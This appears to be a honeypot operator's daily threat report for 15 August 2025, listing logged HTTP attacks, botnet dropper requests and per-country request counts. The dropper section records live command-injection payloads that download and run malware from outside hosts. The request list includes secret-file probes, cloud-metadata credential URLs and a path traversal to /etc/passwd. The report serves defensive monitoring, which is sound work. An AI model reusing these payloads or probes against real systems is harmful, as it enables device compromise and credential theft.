Table of Contents

Daily Report: 2025-08-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 474 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1035 requests were recorded during the day, originating from 3 different countries, with a peak of 745 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
DE	Germany
US	Germany
FR	Dubai
US	Dubai

botnet_dropper_behaviour
#

remote_addr	request
217.113.49.161	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.245.231.188/vtubers.sh+-O+/tmp/netgear;chmod+777+/tmp/netgear;sh+/tmp/netgear;rm+-rf+/tmp/netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
120.85.117.196	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.44	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20axis.arm7l%3B%20wget%20http%3A%2F%2F198.251.89.190%2Faxe%2Faxis.arm7l%3B%20chmod%20%2Bx%20axis.arm7l%3B%20.%2Faxis.arm7l%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
48	2	CONNECT api64.ipify.org:443 HTTP/1.1
57	1	GET /aruba-central-cloud-keys HTTP/1.1
58	1	GET /websphere/appserver/profiles/ HTTP/1.1
61	1	GET /src/config/config.php HTTP/1.1
62	1	GET /email/sendmail.php HTTP/1.1
63	1	GET /aws_xray/daemon_cfg HTTP/1.1
64	1	GET /controllers/send_mail.php HTTP/1.1
65	1	GET /controllers/send_mail_back.php HTTP/1.1
66	1	GET /application/libraries/MY_Email.php HTTP/1.1
67	1	GET /handlePost-allinbox-test.php HTTP/1.1
69	1	GET /admin/controllers/function.php HTTP/1.1
70	1	GET /modules/vendor/mailgun/mailgun-php/tests/Mailgun/Tests/MailgunTest.php HTTP/1.1
71	1	GET /application/models/User_notif_m.php HTTP/1.1
72	1	GET /application/models/Email_model.php HTTP/1.1
73	1	GET /.submit-contact-form.php.swp HTTP/1.1
74	1	GET /meraki-api-dashboard-key HTTP/1.1
75	1	GET /api/wp-content/themes/ngyn/functions.php HTTP/1.1
76	1	GET /ajax/user.php HTTP/1.1
77	1	GET /firebase-functions-config HTTP/1.1
78	1	GET /application/classes/Mailer.php HTTP/1.1
79	1	GET /mq-broker-users.ldif HTTP/1.1
80	1	GET /manage/Paradigm/Paradigm.php HTTP/1.1
81	1	GET /zain_property/settings.py HTTP/1.1
82	1	GET /admin/logic.php HTTP/1.1
83	1	GET /application/models/category_model.php HTTP/1.1
84	1	GET /prometheus/graph HTTP/1.1
85	1	GET /aws/cloudwatch/.env.metricfilters HTTP/1.1
86	1	GET /api/v9/global.php HTTP/1.1
87	1	GET /cost_data_email.php HTTP/1.1
88	1	GET /app/Plugin/Travel/Controller/OperationFilesController.php HTTP/1.1
89	1	GET /ecs/ecs.config HTTP/1.1
90	1	GET /sendgridapi.php HTTP/1.1
91	1	GET /app/ HTTP/1.1
92	1	GET /src/UTT/IndexBundle/Service/EmailService.php HTTP/1.1
93	1	GET /pages/aide_et_assistance.php HTTP/1.1
94	1	GET /strapi/admin/auth/providers HTTP/1.1
95	1	GET /boardingnew/correo/correo.php HTTP/1.1
96	1	GET /au/index.html HTTP/1.1
98	1	GET /.env.migjen HTTP/1.1
99	1	GET /passwordForgotEmailSend.php HTTP/1.1
100	1	GET /application/controllers/book.php HTTP/1.1
102	1	GET /src/helpers/brevoMailer.ts HTTP/1.1
103	1	GET /application/controllers/Cron.php HTTP/1.1
104	1	GET /class/contractors.php HTTP/1.1
105	1	GET /sendphase3invoice.php HTTP/1.1
106	1	GET /gamelift-fleet-credentials HTTP/1.1
107	1	GET /spinnaker-pipeline-secure HTTP/1.1
108	1	GET /mikrotik-routeros-config HTTP/1.1
109	1	GET /balancer-manager HTTP/1.1
110	1	GET /aws/cur/.env.reports HTTP/1.1
111	1	GET /submit_form.php HTTP/1.1
112	1	GET /api/SendEmail.php HTTP/1.1
113	1	GET /ev_panel/cron/sendEmail.php HTTP/1.1
114	1	GET /emailTest.php HTTP/1.1
115	1	GET /@core/env-sample.txt HTTP/1.1
116	1	GET /api/app/helpers/email_helper.php HTTP/1.1
117	1	GET /ontimegov/helpers/email_helper.php HTTP/1.1
118	1	GET /application/config/production/config.php HTTP/1.1
119	1	GET /sendMail.php HTTP/1.1
120	1	GET /submitted-forgot-password.php HTTP/1.1
121	1	GET /gatsby/.env.cache HTTP/1.1
122	1	GET /application/helpers/globalfunction_helper.php HTTP/1.1
123	1	GET /charge.php HTTP/1.1
124	1	GET /ionic-capacitor/.env.native HTTP/1.1
125	1	GET /sms/test.php HTTP/1.1
127	1	GET /cassandra/.env.cql HTTP/1.1
128	1	GET /page/boardingnew/correo/correo.php HTTP/1.1
129	1	GET /global/php/gbl_general.php HTTP/1.1
130	1	GET /fuel.sql HTTP/1.1
132	1	GET /rvpruebas/enviaremail.php HTTP/1.1
133	1	GET /application/controllers/Inventory.php HTTP/1.1
134	1	GET /application/controllers/api/v1.php HTTP/1.1
135	1	GET /flutter-secure-storage.conf HTTP/1.1
136	1	GET /mlflow/.env.experiment HTTP/1.1
137	1	GET /dbfunctions.php HTTP/1.1
138	1	GET /application/helpers/autogenerate_helper.php HTTP/1.1
139	1	GET /.env] HTTP/1.1
140	1	GET /page/bases_restablecer.php HTTP/1.1
145	1	GET /airflow/webserver_config.py HTTP/1.1
146	1	GET /JS Scanner HTTP/1.1
147	1	GET /golf/functions_toolin.php HTTP/1.1
148	1	GET /shared/helpers/SendGridHelper.php HTTP/1.1
149	1	GET /api/datas.py HTTP/1.1
150	1	GET /cloudfront/aws_cdn_keys.pem HTTP/1.1
151	1	GET /superadmin/application/controllers/Booking.php HTTP/1.1
152	1	GET /receive.php HTTP/1.1
153	1	GET /actix-web/.env.cargo HTTP/1.1
154	1	GET /umbraco-connection-strings HTTP/1.1
155	1	GET /ConfigContact.php HTTP/1.1
156	1	GET /cron/60950_sendMail.php HTTP/1.1
157	1	GET /all_config/constants.php HTTP/1.1
158	1	GET /signoff.php HTTP/1.1
159	1	GET /near/.env.wallet HTTP/1.1
160	1	GET /Functions/CommonFunctions.php HTTP/1.1
161	1	GET /forgot_password.php HTTP/1.1
163	1	GET /copilot/.workspace HTTP/1.1
166	1	GET /home/user/.config/ HTTP/1.1
169	1	GET /admin/php-smtp-admin/ HTTP/1.1
171	1	GET /backup/smtp_backup.env HTTP/1.1
172	1	GET /s3cfg HTTP/1.1
174	1	GET /lib/cron.class.php HTTP/1.1
176	1	GET /db-bk-07052024.sql HTTP/1.1
177	1	GET /application/controllers/back/Admin.php HTTP/1.1
179	1	GET /aws_ses_credentials.env HTTP/1.1
180	1	GET /logstash/smtp_logs.conf HTTP/1.1
181	1	GET /email/config.ini HTTP/1.1
182	1	GET /http://168.63.129.16/metadata/instance HTTP/1.1
183	1	GET /api/classes/Waiter.php HTTP/1.1
184	1	GET /aws_apigateway/api_keys.bak HTTP/1.1
185	1	GET /modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po HTTP/1.1
187	1	GET /secrets/aws_keys HTTP/1.1
192	1	GET /harbor-registry-secrets HTTP/1.1
195	1	GET /modules/contrib/sendgrid_mail/sendgrid_mail.settings.php HTTP/1.1
196	1	GET /en/phpinfo HTTP/1.1
198	1	GET /app/Http/Controllers/UserController.php HTTP/1.1
199	1	GET /helpers/MailHelper.php HTTP/1.1
200	1	GET /gruhg/MixWardMonthlyReport.php HTTP/1.1
202	1	GET /manage/Paradigm/processEmail.php HTTP/1.1
203	1	GET /aws_credentials/.env HTTP/1.1
204	1	GET /project/.env.example HTTP/1.1
205	1	GET /include/form.php HTTP/1.1
206	1	GET /angular-env-encrypted.ts HTTP/1.1
207	1	GET /config/Database.php HTTP/1.1
209	1	GET /aws/deepracer/.env.models HTTP/1.1
212	1	GET /aws_healthlake/fhir_creds HTTP/1.1
214	1	GET /wp-content/uploads/wp-mail.php HTTP/1.1
215	1	GET /aws_ses_credentials HTTP/1.1
216	1	GET /kubernetes/smtp-secret.yaml HTTP/1.1
217	1	GET /webmail/config.php HTTP/1.1
222	1	GET /api/swagger-ui.html HTTP/1.1
223	1	GET /http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
225	1	GET /ovh/config/smtp.env HTTP/1.1
233	1	CONNECT ipv4.jsonip.com:443 HTTP/1.1
234	1	POST /diagnostic.php HTTP/1.1
245	1	CONNECT 45.113.192.101:443 HTTP/1.1
247	1	GET /application/controllers/admin/Vida.php HTTP/1.1
249	1	GET /tmp/.env.tmp HTTP/1.1
250	1	GET /system/application/config/email.php HTTP/1.1
251	1	GET /backend/components/Utils.php HTTP/1.1
252	1	GET /globalconfig-sample.php HTTP/1.1
253	1	GET /pytorch/.env.distributed HTTP/1.1
254	1	GET /.env_local HTTP/1.1
255	1	GET /dynamodb-streams-keys HTTP/1.1
257	1	GET /aws_iot/core_private.key HTTP/1.1
258	1	GET /knative-serving-secure HTTP/1.1
259	1	GET /azure-functions/.env.durable HTTP/1.1
264	1	GET /systembc/ HTTP/1.1
267	1	GET /circleci/.env.contexts HTTP/1.1
269	1	GET /socket.io/1/?t=1755248251601 HTTP/1.1
277	1	\x04\x01\x01\xBB-q\xC0eMOZ\x00
311	1	GET /application/controllers/Login.php HTTP/1.1
312	1	GET /env-production-stable.php HTTP/1.1
313	1	GET /controller/CommandsController.php HTTP/1.1
314	1	GET /aws/rekognition/.env.collections HTTP/1.1
319	1	GET /layouts/config_orig.php HTTP/1.1
320	1	GET /application/controllers/admin/Telesuscripcion.php HTTP/1.1
322	1	GET /jmx-console/ HTTP/1.1
324	1	GET /shopify/.env.appproxy HTTP/1.1
325	1	GET /mahara-export-credentials HTTP/1.1
326	1	GET /redis/redis.conf HTTP/1.1
327	1	GET /vmware-sdwan-config-secrets HTTP/1.1
328	1	GET /dist/.env.prod HTTP/1.1
329	1	GET /laravel-encrypted-env HTTP/1.1
331	1	GET /codebuild/buildspec.yml HTTP/1.1
332	1	GET /application/config/config-dwij.php HTTP/1.1
333	1	GET /.env_old_8_Jan_2024 HTTP/1.1
334	1	GET /db_login.php HTTP/1.1
335	1	GET /sistema/application/models/util.php HTTP/1.1
336	1	GET /partners/internal/sendinblue/helpers.php HTTP/1.1
337	1	GET /wp-content/themes/twentytwentythree/phpmailer/example.php HTTP/1.1
338	1	GET /.env-do HTTP/1.1
339	1	GET /application/models/Sendgrid_model.php HTTP/1.1
340	1	GET /admin_portal/config/config.php HTTP/1.1
341	1	GET /ec2-metadata/iam/security-credentials HTTP/1.1
342	1	GET /semaphore-env-protected HTTP/1.1
343	1	GET /timestream-write-records-key HTTP/1.1
344	1	GET /.env-live HTTP/1.1
345	1	GET /.env-demo HTTP/1.1
346	1	GET /fastapi-auth-env.enc HTTP/1.1
348	1	GET /linode-ipsec-credentials HTTP/1.1
349	1	GET /.env.durable HTTP/1.1
351	1	GET /containerd/.env.runc HTTP/1.1
352	1	GET /ecr-scanning-credentials HTTP/1.1
353	1	GET /roblox/.env.studio HTTP/1.1
354	1	GET /helm-secrets-plugin.yaml HTTP/1.1
355	1	GET /symfony/app/config/parameters.yml HTTP/1.1
356	1	GET /polly-lexicons-secure HTTP/1.1
357	1	GET /argo-workflows-secrets.yaml HTTP/1.1
358	1	GET /esp32/.env.flash HTTP/1.1
359	1	GET /cinawaves/apis-functions/func.php HTTP/1.1
360	1	GET /origami/content/sendgrid_results.php HTTP/1.1
361	1	GET /origami/email/email.php HTTP/1.1
362	1	GET /backup/env.prod.bak HTTP/1.1
363	1	GET /.devenv HTTP/1.1
364	1	GET /blast_email.php1 HTTP/1.1
365	1	GET /cron_callcanter_call_batch.php HTTP/1.1
366	1	GET /loantrack2/app/config/aws_sdk.php HTTP/1.1
367	1	GET /circleci/config.yml.enc HTTP/1.1
368	1	GET /Ads/application/helpers/mails_helper.php HTTP/1.1
369	1	GET /server/src/contact/contact.service.ts HTTP/1.1
370	1	GET /controllers/record_patient_leave.php HTTP/1.1
371	1	GET /aws/eventbridge/.env.archive HTTP/1.1
372	1	GET /mysql/vrio_latest.sql HTTP/1.1
373	1	GET /laravel/app/Console/Commands/LessonHistoryMailCommand.php HTTP/1.1
374	1	GET /ss/.env HTTP/1.1
376	1	GET /bitnami/credentials HTTP/1.1
377	1	GET /includes/php/main.php HTTP/1.1
378	1	GET /ceo/.env HTTP/1.1
379	1	GET /uploads/.env.old HTTP/1.1
380	1	GET /magento/.env.composer HTTP/1.1
381	1	GET /ghost/.env.mail HTTP/1.1
383	1	GET /drone/.env.steps HTTP/1.1
384	1	GET /app/shopify/libraries/mailer.php HTTP/1.1
385	1	GET /var/www/smtp.conf HTTP/1.1
386	1	GET /ds-college-management/switcher_backup.env HTTP/1.1
390	1	GET /aws/outposts/.env.rack HTTP/1.1
391	1	GET /aws/codestarnotifications/.env.rules HTTP/1.1
392	1	GET /401 HTTP/1.1
393	1	GET /aws/braket/.env.quantum HTTP/1.1
394	1	GET /Relay/relay.php HTTP/1.1
395	1	GET /lightsail/instance_metadata HTTP/1.1
398	1	GET /.git/info/ HTTP/1.1
400	1	GET /.git/branches HTTP/1.1
410	1	GET /.git/hooks/pre-rebase HTTP/1.1
411	1	GET /.git/hooks/update.sample HTTP/1.1
412	1	GET /.svn/tmp/text-base/ HTTP/1.1
414	1	GET /.svn/entries.bak HTTP/1.1
415	1	GET /.git/logs/refs/heads/main HTTP/1.1
416	1	GET /.svn/pristine/.config HTTP/1.1
418	1	GET /phpinfo/debug/index.php HTTP/1.1
419	1	GET /info/debug.php HTTP/1.1
420	1	GET /secure/phpinfo.php HTTP/1.1
422	1	GET /php/admin/info.php HTTP/1.1
423	1	GET /php/debug/php_info.php HTTP/1.1
424	1	GET /phpinfo/admin/index.php HTTP/1.1
425	1	GET /debug/phpconfig.php HTTP/1.1
426	1	GET /config/debug/phpinfo.php HTTP/1.1
427	1	GET /internal/phpinfo.php HTTP/1.1
428	1	GET /.git/hooks/post-update HTTP/1.1
429	1	GET /phpinfo/debug/phpinfo.php HTTP/1.1
430	1	GET /php/config/info.php HTTP/1.1
431	1	GET /debug/phpinfo/config.php HTTP/1.1
432	1	GET /protected/debug.php HTTP/1.1
433	1	GET /internal/debug.php HTTP/1.1
434	1	GET /php/debug/phpinfo.php HTTP/1.1
435	1	GET /php/info/debugger.php HTTP/1.1
440	1	GET /php/admin/config.php HTTP/1.1
441	1	GET /staging/.hidden/aws-hidden.json HTTP/1.1
442	1	GET /hidden/keys/private-key.pem HTTP/1.1
443	1	GET /secure/.hidden-configs/private-secrets HTTP/1.1
444	1	GET /.hidden/.backup/env.json HTTP/1.1
445	1	GET /.hidden/docker/.private-config HTTP/1.1
446	1	GET /.hidden/api/.backup.json HTTP/1.1
447	1	GET /tmp/.hidden-sensitive.json HTTP/1.1
448	1	GET /private/.hidden-backup.env HTTP/1.1
449	1	GET /.hidden/config/internal-cache.json HTTP/1.1
450	1	GET /hidden-keys/.private-key.pem HTTP/1.1
451	1	GET /.git/hooks/commit-msg HTTP/1.1
452	1	GET /frontend/.hidden/env.js HTTP/1.1
453	1	GET /docker/.hidden/keys-backup.json HTTP/1.1
454	1	GET /tmp/.hidden/.internal-aws.json HTTP/1.1
455	1	GET /docker/config.json HTTP/1.1
456	1	GET /docker/secrets/keys.json HTTP/1.1
457	1	GET /docker/.hidden/registry-pass.txt HTTP/1.1
458	1	GET /docker/.backup/.secrets.json HTTP/1.1
459	1	GET /docker/.config/keys.json HTTP/1.1
460	1	GET /.docker/.hidden-env HTTP/1.1
461	1	GET /docker/.cache/hidden-config.json HTTP/1.1
462	1	GET /docker/private/.hidden-keys.json HTTP/1.1
463	1	GET /backend/.hidden/.config HTTP/1.1
464	1	GET /.svn/admin/ HTTP/1.1
465	1	GET /.git/objects/info/packs HTTP/1.1
468	1	GET /.svn/.hidden HTTP/1.1
469	1	GET /.svn/.backup HTTP/1.1
470	1	GET /.hidden/secure.env HTTP/1.1
471	1	GET /.hidden_configs/private.json HTTP/1.1
472	1	GET /.hidden/.sensitive_backup HTTP/1.1
473	1	GET /.hidden/.env_secrets HTTP/1.1
474	1	GET /docker/.hidden_logs/debug.log HTTP/1.1
475	1	GET /config/.hidden/backup.json HTTP/1.1
476	1	GET /temp/.hidden/.secure_env HTTP/1.1
477	1	GET /docker/.hidden/.docker_config.json HTTP/1.1
478	1	GET /hidden/internal/.secrets.json HTTP/1.1
479	1	GET /secure/.hidden/aws-config.env HTTP/1.1
480	1	GET /api/.hidden/.internal_env HTTP/1.1
481	1	GET /mail/.hidden/backup-secrets HTTP/1.1
482	1	GET /smtp/.hidden/.keys HTTP/1.1
483	1	GET /temp/.hidden_files/env.json HTTP/1.1
484	1	GET /hidden_env/.internal_config HTTP/1.1
485	1	GET /hidden_files/.hidden_env HTTP/1.1
486	1	GET /.hidden_logs/error.log HTTP/1.1
497	1	GET /profiler/phpinfo.php HTTP/1.1
506	1	GET /weblau/portal/visualizador/arquivos/laudo?id=../../../../../../../etc/passwd HTTP/1.1
532	1	GET /private/.smtp-hidden.env HTTP/1.1
533	1	GET /smtp-backup/private/smtp.env HTTP/1.1
534	1	GET /smtp/cache/env-config.json HTTP/1.1
535	1	GET /mail/.smtp-hidden.json HTTP/1.1
536	1	GET /sendgrid/.hidden/smtp.env HTTP/1.1
537	1	GET /secure/.smtp-cache.env HTTP/1.1
538	1	GET /.smtp/secrets.json HTTP/1.1
539	1	GET /tmp/.smtp-hidden.env HTTP/1.1
540	1	GET /.secure/smtp-sensitive.json HTTP/1.1
541	1	GET /smtp/.cache/.env HTTP/1.1
542	1	GET /smtp/hidden-keys.json HTTP/1.1
544	1	GET /debug/phpinfo.php HTTP/1.1
545	1	GET /php/debug/info.php HTTP/1.1
546	1	GET /php/phpconfig.php HTTP/1.1
551	1	GET /debug/info.php HTTP/1.1
552	1	GET /protected/phpinfo.php HTTP/1.1
555	1	GET /smtp/.backup/smtp.env HTTP/1.1
556	1	GET /sendgrid/.private/smtp.env HTTP/1.1
557	1	GET /mail/.smtp/secrets.json HTTP/1.1
558	1	GET /backend/.smtp-config.json HTTP/1.1
559	1	GET /config/smtp/.keys.env HTTP/1.1
560	1	GET /smtp/internal/secrets.env HTTP/1.1
561	1	GET /smtp/.hidden/.config.json HTTP/1.1
562	1	GET /secure/.smtp-hidden.env HTTP/1.1
563	1	GET /smtp/.internal-keys.env HTTP/1.1
564	1	GET /mail/.hidden-smtp.env HTTP/1.1
565	1	GET /smtp/private-config.env HTTP/1.1
566	1	GET /.smtp/secrets/.keys.env HTTP/1.1
567	1	GET /smtp-backup/.keys.json HTTP/1.1
568	1	GET /api/smtp/.secure.env HTTP/1.1
569	1	GET /smtp-hidden/secrets.json HTTP/1.1
570	1	GET /.secure/smtp-private.env HTTP/1.1
571	1	GET /backend/smtp/.secure.env HTTP/1.1
572	1	GET /tmp/smtp-sensitive.env HTTP/1.1
573	1	GET /configs/.smtp-keys.json HTTP/1.1
574	1	GET /hidden/smtp-secrets.env HTTP/1.1
575	1	GET /temp/smtp/private.env HTTP/1.1
576	1	GET /private/smtp/env.json HTTP/1.1
577	1	GET /sendgrid/.cache/.smtp.json HTTP/1.1
578	1	GET /.aws/.backup/private-config.env HTTP/1.1
579	1	GET /aws-cache/aws-temp-keys.json HTTP/1.1
580	1	GET /.aws-backup/aws-env-bak.json HTTP/1.1
581	1	GET /assets/config/.aws-keys.js HTTP/1.1
582	1	GET /frontend/.aws-tokens.json HTTP/1.1
583	1	GET /js/aws/keys.json HTTP/1.1
584	1	GET /js/config/.aws-cache.env HTTP/1.1
585	1	GET /js/env/aws.json HTTP/1.1
586	1	GET /aws/private/.secure-session.env HTTP/1.1
587	1	GET /aws/.keys/.temp-credentials.json HTTP/1.1
588	1	GET /docker/secrets/.private-docker.json HTTP/1.1
589	1	GET /.hidden/aws/.session-tokens.json HTTP/1.1
590	1	GET /aws/.hidden/aws-temp-cache.json HTTP/1.1
591	1	GET /apache2/apache2.conf HTTP/1.1
592	1	GET /nginx/nginx.conf HTTP/1.1
594	1	GET /apache2/conf/httpd.conf HTTP/1.1
595	1	GET /nginx/conf.d/default.conf HTTP/1.1
596	1	GET /nginx/ssl.conf HTTP/1.1
597	1	GET /nginx/default.conf HTTP/1.1
599	1	GET /.aws-backup/.private-session.env HTTP/1.1
600	1	GET /.aws/cache/session-tokens.json HTTP/1.1
601	1	GET /.aws/private/aws-keys.json HTTP/1.1
602	1	GET /aws/.hidden/env/credentials.json HTTP/1.1
603	1	GET /aws/.secure/aws-keys.env HTTP/1.1
604	1	GET /aws/.temp/aws-hidden-keys.json HTTP/1.1
605	1	GET /aws-backup/.credentials.bak HTTP/1.1
606	1	GET /aws/.backup/aws-sensitive-config.json HTTP/1.1
607	1	GET /.aws/.internal/secrets/aws-temp.json HTTP/1.1
608	1	GET /.terraform/.aws/keys.json HTTP/1.1
609	1	GET /.gitlab-ci/.aws/credentials HTTP/1.1
610	1	GET /tmp/.aws/.keys-session.json HTTP/1.1
611	1	GET /.github/workflows/aws-secrets.env HTTP/1.1
612	1	GET /jenkins/.aws/hidden-keys.json HTTP/1.1
613	1	GET /azure/.hidden/aws-tokens.json HTTP/1.1
614	1	GET /docker/.aws/cli-credentials.json HTTP/1.1
615	1	GET /.aws/cli/cache/private-session.json HTTP/1.1
616	1	GET /tmp/aws/.credentials HTTP/1.1
617	1	GET /tmp/.aws/session-cache.json HTTP/1.1
618	1	GET /aws/.env.bak HTTP/1.1
619	1	GET /aws/.cache/private-env.json HTTP/1.1
620	1	GET /aws/.private/credentials_backup.json HTTP/1.1
621	1	GET /aws/.hidden/secrets.env HTTP/1.1
622	1	GET /.ci/aws/config.env HTTP/1.1
623	1	GET /apache/debug.conf HTTP/1.1
633	1	GET /nginx/conf/nginx.backup HTTP/1.1
640	1	GET /credentials/smtp.txt HTTP/1.1
642	1	GET /docker/laravel/app/.env HTTP/1.1
644	1	GET /mailserver/.env HTTP/1.1
646	1	GET /apache2/conf/extra/httpd-ssl.conf HTTP/1.1
647	1	GET /apache2/extra/httpd-vhosts.conf HTTP/1.1
648	1	GET /nginx/cache/nginx-keys.conf HTTP/1.1
649	1	GET /apache2/logs/error.log HTTP/1.1
650	1	GET /nginx/logs/error.log HTTP/1.1
651	1	GET /apache2/logs/access.log HTTP/1.1
652	1	GET /apache2/conf.d/ssl.conf HTTP/1.1
653	1	GET /nginx/sites-available/default HTTP/1.1
654	1	GET /etc/nginx/sites-enabled/default HTTP/1.1
656	1	GET /apache2/debug/httpd-debug.conf HTTP/1.1
657	1	GET /apache/logs/access.log HTTP/1.1
658	1	GET /nginx/nginx.backup.conf HTTP/1.1
659	1	GET /nginx/conf/default.conf HTTP/1.1
660	1	GET /nginx/logs/config.log HTTP/1.1
661	1	GET /tmp/nginx.conf HTTP/1.1
662	1	GET /etc/nginx/conf.d/nginx-backup.conf HTTP/1.1
663	1	GET /etc/apache2/sites-enabled/default-ssl.conf HTTP/1.1
664	1	GET /apache2/ssl/httpd-ssl.conf HTTP/1.1
665	1	GET /nginx/conf/mime.types HTTP/1.1
666	1	GET /etc/httpd/conf/httpd.backup.conf HTTP/1.1
667	1	GET /tmp/nginx-hidden.conf HTTP/1.1
668	1	GET /tmp/apache.conf HTTP/1.1
669	1	GET /config/.next/.env HTTP/1.1
675	1	GET /.github/workflows/.env HTTP/1.1
677	1	GET /aws/cli/.env HTTP/1.1
679	1	GET /.aws/.hidden/config.json HTTP/1.1
682	1	GET /config/logs/.hidden-env HTTP/1.1
683	1	GET /configs/.env.bak HTTP/1.1
684	1	GET /config/.cache/.env HTTP/1.1
685	1	GET /env/.cache/backup-env HTTP/1.1
686	1	GET /.hidden/.backup.env HTTP/1.1
687	1	GET /.old/.env HTTP/1.1
688	1	GET /envs/.staging/.env HTTP/1.1
689	1	GET /config/old/.env HTTP/1.1
691	1	GET /.terraform/.env HTTP/1.1
692	1	GET /.hidden/.docker/.registry.json HTTP/1.1
693	1	GET /tmp/.docker/secrets.json HTTP/1.1
694	1	GET /tmp/docker/.config.json HTTP/1.1
695	1	GET /docker/.env.hidden HTTP/1.1
696	1	GET /docker/secure/.hidden-docker-keys.json HTTP/1.1
697	1	GET /secure/docker/.registry-credentials.json HTTP/1.1
698	1	GET /docker/.cache/.secure-config.json HTTP/1.1
699	1	GET /docker/.backup/registry-pass.bak HTTP/1.1
700	1	GET /hidden/docker/.docker-hidden-config.json HTTP/1.1
702	1	GET /backend/.next.env HTTP/1.1
703	1	GET /.env.laravel HTTP/1.1
704	1	GET /.env.node HTTP/1.1
705	1	GET /node/config/.env HTTP/1.1
707	1	GET /api/.django.env HTTP/1.1
708	1	GET /config/.django/.env HTTP/1.1
710	1	GET /env/.symfony.env HTTP/1.1
711	1	GET /config/.symfony/.env HTTP/1.1
713	1	GET /backend/config/.rails.env HTTP/1.1
714	1	GET /config/.laravel.env HTTP/1.1
715	1	GET /configurations/.config.bak HTTP/1.1
716	1	GET /temp/sensitive_backup.env HTTP/1.1
717	1	GET /internal/.backup/aws-secrets.bak HTTP/1.1
718	1	GET /apache/logs/httpd.conf.bak HTTP/1.1
719	1	GET /nginx/config/backup-config.json HTTP/1.1
720	1	GET /tmp/hidden_backup.env HTTP/1.1
721	1	GET /private/backups/.credentials HTTP/1.1
722	1	GET /.backup/.hidden-env.json HTTP/1.1
723	1	GET /config/.hidden-config.bak HTTP/1.1
724	1	GET /configs/.hidden-secrets.bak HTTP/1.1
725	1	GET /assets/config/.env HTTP/1.1
726	1	GET /backend/backup/.secure-backup.json HTTP/1.1
727	1	GET /frontend/.env.bak HTTP/1.1
728	1	GET /.docker/.hidden-backup.env HTTP/1.1
729	1	GET /aws/.backup/.credentials-hidden HTTP/1.1
730	1	GET /tmp/aws/.hidden-backup.env HTTP/1.1
731	1	GET /.old/.hidden-env.bak HTTP/1.1
732	1	GET /hidden/.backup.env HTTP/1.1
733	1	GET /secure/.hidden/backup-secrets.json HTTP/1.1
736	1	GET /.aws/.hidden/credentials.json HTTP/1.1
737	1	GET /.hidden/.bak.env HTTP/1.1
738	1	GET /js/config/.env HTTP/1.1
739	1	GET /js/env/.hidden.env HTTP/1.1
741	1	GET /private/.config/env.json HTTP/1.1
742	1	GET /backend/env/.secure-env HTTP/1.1
743	1	GET /.hidden/envs/.staging.env HTTP/1.1
744	1	GET /tmp/env/.dev.env HTTP/1.1
747	1	GET /env/.env.bak HTTP/1.1
748	1	GET /docker/secrets/.backup HTTP/1.1
749	1	GET /hidden/.backup/.keys HTTP/1.1
750	1	GET /docker/config/.env_backup HTTP/1.1
751	1	GET /credentials_backup.json HTTP/1.1
752	1	GET /db/backup.sql HTTP/1.1
753	1	GET /staging/backup-config.json HTTP/1.1
755	1	GET /hidden_configs/.config_bak HTTP/1.1
756	1	GET /secure/.keys_backup HTTP/1.1
757	1	GET /mail/smtp/.smtp-keys.bak HTTP/1.1
758	1	GET /aws/.config_backup HTTP/1.1
759	1	GET /debug/.backup/env.json HTTP/1.1
760	1	GET /settings.conf.bak HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	745	GB
1	99	US
2	34	FR
3	24	BG
4	20	DE
5	13	SC
6	12	EE
7	11	CN
8	11	HK
9	9	CH
10	7	NL
11	7	LT
12	6	ZA
13	4	RO
14	3	MU
15	3	BE
16	3	PL
17	3	IR
18	2	ES
19	2	SG
20	2	AE
21	2	IN
22	2	PT
23	2	TR
24	2	SE
25	1	HU
26	1	IT
27	1	UA
28	1	JP
29	1	GR
30	1	ID
31	1	AZ

Report: 2025-08-14

14 August 2025·253 words

Repport Daily

Report: 2025-08-13

13 August 2025·309 words

Repport Daily

Report: 2025-08-12

12 August 2025·334 words

Repport Daily

	number_of_occurence	country_iso_code
0	745	GB
1	99	US
2	34	FR
3	24	BG
4	20	DE
5	13	SC
6	12	EE
7	11	CN
8	11	HK
9	9	CH
10	7	NL
11	7	LT
12	6	ZA
13	4	RO
14	3	MU
15	3	BE
16	3	PL
17	3	IR
18	2	ES
19	2	SG
20	2	AE
21	2	IN
22	2	PT
23	2	TR
24	2	SE
25	1	HU
26	1	IT
27	1	UA
28	1	JP
29	1	GR
30	1	ID
31	1	AZ

	number_of_occurence	country_iso_code
0	745	GB
1	99	US
2	34	FR
3	24	BG
4	20	DE
5	13	SC
6	12	EE
7	11	CN
8	11	HK
9	9	CH
10	7	NL
11	7	LT
12	6	ZA
13	4	RO
14	3	MU
15	3	BE
16	3	PL
17	3	IR
18	2	ES
19	2	SG
20	2	AE
21	2	IN
22	2	PT
23	2	TR
24	2	SE
25	1	HU
26	1	IT
27	1	UA
28	1	JP
29	1	GR
30	1	ID
31	1	AZ

Daily Report: 2025-08-15#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-08-15
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	745	GB
1	99	US
2	34	FR
3	24	BG
4	20	DE
5	13	SC
6	12	EE
7	11	CN
8	11	HK
9	9	CH
10	7	NL
11	7	LT
12	6	ZA
13	4	RO
14	3	MU
15	3	BE
16	3	PL
17	3	IR
